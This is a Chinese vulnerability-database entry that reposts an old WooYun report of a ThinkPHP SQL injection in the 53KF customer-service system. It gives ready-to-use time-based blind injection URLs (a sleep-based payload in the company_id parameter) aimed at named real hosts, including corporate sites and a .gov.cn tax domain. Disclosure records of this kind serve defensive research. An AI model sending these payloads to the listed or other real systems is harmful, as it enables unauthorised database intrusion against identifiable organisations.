|53KF客服系统通用注入（thinkphp案例） - VULHUB开源网络安全威胁库

53KF客服系统通用注入（thinkphp案例）

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： thinkphp 框架注入. ### 详细说明：见 [WooYun: ThinkPHP最新版本SQL注入漏洞](http://www.wooyun.org/bugs/wooyun-2014-087731) 延时注入: http://test2.53kf.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id[0]==-1%20or%201!=sleep(1)))limit%201%23between ### 漏洞证明：很多企业都使用此客服系统: ``` 恒生电子 http://webcall7.hundsun.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id[0]==-1%20or%201!=sleep(1)))limit%201%23between 北京汽车 http://kf02.baicmotorsales.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id[0]==-1%20or%201!=sleep(1)))limit%201%23between http://csuser.jia.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1 http://cs.ub8kf.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1 http://kf2.js-l-tax.gov.cn/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1...

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™